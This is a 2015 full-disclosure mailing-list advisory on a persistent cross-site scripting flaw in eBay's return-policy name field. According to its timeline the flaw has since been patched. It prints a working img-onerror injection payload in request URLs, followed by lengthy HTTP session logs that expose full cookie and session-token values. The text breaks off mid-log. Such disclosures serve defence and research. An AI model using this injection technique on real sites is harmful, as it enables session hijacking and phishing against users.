[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-04-21 9:58:08
Message-ID: 55361F30.1040803 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1228
Release Date:
=============
2015-03-25
Vulnerability Laboratory ID (VL-ID):
====================================
1228
Common Vulnerability Scoring System:
====================================
4
Product & Service Introduction:
===============================
eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered \
in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable \
success story of the dot-com bubble; it is now a multi-billion dollar business with operations \
localized in over thirty countries. The company manages eBay.com, an online auction and \
shopping website in which people and businesses buy and sell a broad variety of goods and \
services worldwide. In addition to its auction-style sellings, the website has since expanded \
to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via \
Half.com); online classified advertisements online event ticket trading online money transfers \
and other services.
(Copy of the Homepage: http://en.wikipedia.org/wiki/EBay )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web \
vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API).
Vulnerability Disclosure Timeline:
==================================
2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security \
GmbH)
2014-03-17: Vendor Notification (eBay Inc - Security Research Team)
2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team)
2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team)
2015-03-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Ebay Inc.
Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple application-side input validation web vulnerabilities has been discovered in the \
official Ebay Xcom Policy Web-Application (CMS & API). A persistent validation web \
vulnerability allows remote attackers to inject malicious script codes to the application-side \
of the affected ebay online-service.
The vulnerability is located in the `my ebay account > return policy > edit returm policy \
module. The vulnerable input is the return policy name value. The persistent script code \
execution occurs in the affected vulnerable sections of the connected `businesspolicy/manage` \
and `Activity Log - Item Listing` modules. The attack vector is persistent and the severity is \
medium.
The security risk of the persistent web vulnerability is estimated as medium with a cvss \
(common vulnerability scoring system) count of 4.0. Exploitation of the persistent input \
validation vulnerability requires a low privileged web-application user account and low user \
interaction. Successful exploitation results in session hijacking, persistent phishings \
attacks, persistent external redirect and malware loads or persistent manipulation of affected \
and connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] My Account > Return Policy > Edit Return Policy \
(http://www.bizpolicy.ebay.com/businesspolicy/)
Vulnerable Input(s):
[+] Edit return policy > Policy name
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] ebay.com/businesspolicy/manage
[+] Activity Log - Item Listing > Name
Proof of Concept (PoC):
=======================
The application-side cross site web vulnerability can be exploited by remote attackers with low \
privileged application user account and low or medium user interaction. For security \
demonstration or to reproduce the vulnerability follow the provided information and steps below \
to continue.
PoC: Manage your business policies
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return+Policy+1+
%22%3E%3Cimg+src%3Dx+onerror%3Dprompt([PERSISTENT INJECTED SCRIPT \
CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money \
+Back&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=&_=1395079926788
PoC: Manage your business policies
<a href="return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage">Return \
Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a>
--- PoC Session Logs [GET] (Injection)---
Status: 200[OK]
GET http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return++%22%3E%3C[MALICIOUS \
INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back+%22%3E%3C[MALICIOUS \
INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[MALICIOUS INJECTED SCRIPT \
CODE!])%3B%3E&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&re \
fundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=+%22%3E%3C[MALICIOUS INJECTED \
SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS \
INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT \
CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED \
SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS \
INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT \
CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016 Load \
Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] Request Header:
Host[www.bizpolicy.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage]
Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Edv%3D532737c1%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5Epsi%3DAMiGpAAE*%5E; \
dp1=bkms/in56e99ed8^u1f/Benjamin55086b58^tzo/-3c532745e8^idm/153274c6b^exc/0%3A0%3A0%3A0534ec4d8 \
^pcid/159931376355086b58^reg/%5EflagReg%3D1%5E56e99ed8^mms/0.53272b71.053288945^mpc/0%7C77533466 \
d8^a1p/053288958^u1p/MjAxNC5rdW56bQ**55086b58^bl/DE56e99ed8^pbf/%2340000000000081a88200000455086b58^; \
s=BAQAAAUSucEmyAAWAAAwAClMoiVgxMjI1NjM3OTA2APgAIFMoiVhkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4N \
AAGAAFTKIlYMAFKABhTKIlYNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiVgjMgASAApTKIlYdGVzdENvb2tpZQA9A \
ApTKIlYMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKIlYJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TK \
IlYMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlb \
nRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOQQxMzk1MDc5MzUwOjAAAwABUyiJWDAv3s3bBB0RgoZUFN7eKtp3q+XXQw**; \
nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa1gwMDAwMDAwMQC0AAFTJ0XoMAFkAANVCGtYIzhhADMACVUIa1gzNDEyOCxE \
RVUAywABUyc+4DkAmgALUynJ3TIwMTQua3Vuem1uAEAAClUIa1gyMDE0Lmt1bnptABAAClUIa1gyMDE0Lmt1bnptAPMAIlUI \
a1gkMiRBUEtoTlkvUCQudWpDZ0RKQ0hiLnZtT281ekxSVHoxAMoAIFyNOVhjNzdjZjNkZjE0NDBhMzU4NmMyNDRhZDRmZmZm \
ZmU0ZgFNABhVCGtYNTMyNzM3Y2EuMC4xLjIuMTM2LjAuMC4yAAQAClUIWl0yMDE0Lmt1bnptAJwAOFUIa1huWStzSFoyUHJC \
bWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PQFMABhVCGtYNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4ymyXRGsd3A9RVp8GyedSQ2Mpg46Y*; \
cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; \
npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; \
ds1=ats/1395074781098; \
ns1=BAQAAAUSucEmyAAaAAKUADVUIa1gxMjI1NjM3OTA2LzA7ps7P/+muFmbIebGiTM4y7QojOkA*; \
secses=BAQAAAUSucEmyAAaAAUsAGFUIa1g1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjLdM4p5xXUvbFN7uT+3s6eDqkVrhQ**; \
shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; \
JSESSIONID=A6DA3F8E8AAAD1275E907380FF01C01A; ds2=sotr/b7qgDzzzzzzz^] Connection[keep-alive]
Response Header:
rlogid[t6al%7Cwliodz%3F%3Cwk%7D%3Ee36e*715f-144d1330b33-0x95]
Set-Cookie[JSESSIONID=5C2569C0FFBDC86ABDFC0BFBE77658C6; Path=/
ds2=;Domain=.ebay.com;Path=/
ds1=ats/1395074781098;Domain=.ebay.com;Path=/
ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E;Domain=.ebay.com;Path=/
cssg=d0a5ae451440a428b382fe32fffffe84;Domain=.ebay.com;Path=/
ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQuzK7o*;Domain=.ebay.com;Expires=Tue, \
17-Mar-2015 17:59:47 GMT;Path=/; HttpOnly \
dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^exc/0%3A0%3A0%3A0534ec513 \
^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56e99f13^mpc/0%7C7753346713^mms/0.53272b71.0532889 \
45^a1p/053288993^u1p/MjAxNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086b93^;Domain=.ebay.com;Expires=Wed, \
16-Mar-2016 17:59:47 GMT;Path=/ \
s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1YWU0NTE0NDBhNDI4YjM4MmZlM \
zJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9A \
ApTKImTMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TK \
ImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlb \
nRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1b \
nptALgADFMnOT8xMzk1MDc5MzUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**;Domain=.ebay.com;Path=/; \
HttpOnly secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iWsd46p2pvujmnDykXMnpWKA**;Domain=.ebay.com;Path=/; \
HttpOnly nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuTIzhhADMACVUIa5M \
zNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApVCGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW5 \
6bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGI \
udm1PbzV6TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56bQFMABhVCGuTNTM \
yNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyjT4uLQSg4TVkI;Domain=.ebay.com;Expires=Tue, \
17-Mar-2015 17:59:47 GMT;Path=/ lucky9=9393341;Domain=.ebay.com;Expires=Sat, 16-Mar-2019 \
17:59:47 GMT;Path=/] Content-Encoding[gzip]
Content-Type[application/json;charset=UTF-8]
Transfer-Encoding[chunked]
Date[Mon, 17 Mar 2014 17:59:47 GMT]
Server[eBay Server]
Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395075357940
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[22] Mime Type[text/plain]
Request Header:
Host[my.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/javascript, application/javascript, application/ecmascript, \
application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbayBeta&CurrentPage=MyeBayNextNotificationPreferences&FClassic=true&ssPageName=STRK:ME:MANPX&_trksid=p5039.m2295.l3917]
Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E; \
dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^exc/0%3A0%3A0%3A0534ec513 \
^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56e99f13^mpc/0%7C7753346713^mms/0.53272b71.0532889 \
45^a1p/053288993^u1p/MjAxNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086b93^; \
s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1YWU0NTE0NDBhNDI4YjM4MmZlM \
zJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9A \
ApTKImTMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TK \
ImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlb \
nRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5MzUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**; \
nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuTIzhhADMACVUIa5MzNDEyOCxE \
RVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApVCGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBc \
jTmTYzc3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6 \
TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56bQFMABhVCGuTNTMyNzM3YzAu \
MC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyjT4uLQSg4TVkI; \
cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; \
npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; \
ds1=ats/1395074781098; \
ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQuzK7o*; \
secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iWsd46p2pvujmnDykXMnpWKA**; \
shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; \
JSESSIONID=37628EA4B997D2976280801A071E51EE; ds2=] Connection[keep-alive]
Response Header:
Server[Apache-Coyote/1.1]
rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.g%6047-144d1334a30-0x133]
Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/
ds2=; Domain=.ebay.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; \
Domain=.ebay.com; Path=/ \
dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/1599313763550 \
86ba3^mpc/0%7C7753346723^pbf/%2340000000000081a88200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3 \
A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; \
Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ \
ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*;Domain=.ebay.com;Expires=Tue, \
17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg=d0a5ae451440a428b382fe32fffffe84; \
Domain=.ebay.com; Path=/ \
s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKA \
BhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5L \
mNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ \
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOW \
S9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnO \
U8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/; \
HttpOnly nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3V \
uem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4 \
xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM \
0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5 \
rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; \
Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ \
secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; \
Domain=.ebay.com; Path=/ lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 \
GMT; Path=/] Cache-Control[private]
Pragma[no-cache]
Content-Type[text/plain]
Content-Length[22]
Date[Mon, 17 Mar 2014 18:00:03 GMT]
Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395079046614 \
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[22] Mime Type[text/plain] Request Header:
Host[my.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/javascript, application/javascript, application/ecmascript, \
application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&CurrentPage=MyeBayPreferences&FClassic=true&ssPageName=STRK:ME:MAPRX]
Cookie[ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; \
dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/1599313763550 \
86ba3^mpc/0%7C7753346723^pbf/%2340000000000081a88200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3 \
A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; \
s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKA \
BhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5L \
mNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ \
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOW \
S9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**; \
nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAg \
XI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4 \
LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERF \
VQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4A \
nAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; \
cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; \
npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; \
ds1=ats/1395074781098; \
ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*; \
secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; \
shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; \
JSESSIONID=37628EA4B997D2976280801A071E51EE] Connection[keep-alive]
Response Header:
Server[Apache-Coyote/1.1]
rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.32%3Ef-144d1334c9e-0x132]
Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/
ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; \
Domain=.ebay.com; Path=/ \
dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/1599313763550 \
86ba3^pbf/%2340000000000081a88200000455086ba3^mpc/0%7C7753346723^tzo/-3c53274633^exc/0%3A0%3A0%3 \
A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; \
Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ \
ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*;Domain=.ebay.com;Expires=Tue, \
17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg=d0a5ae451440a428b382fe32fffffe84; \
Domain=.ebay.com; Path=/ \
s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKA \
BhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5L \
mNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ \
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOW \
S9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnO \
U8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/; \
HttpOnly nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3V \
uem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4 \
xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM \
0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5 \
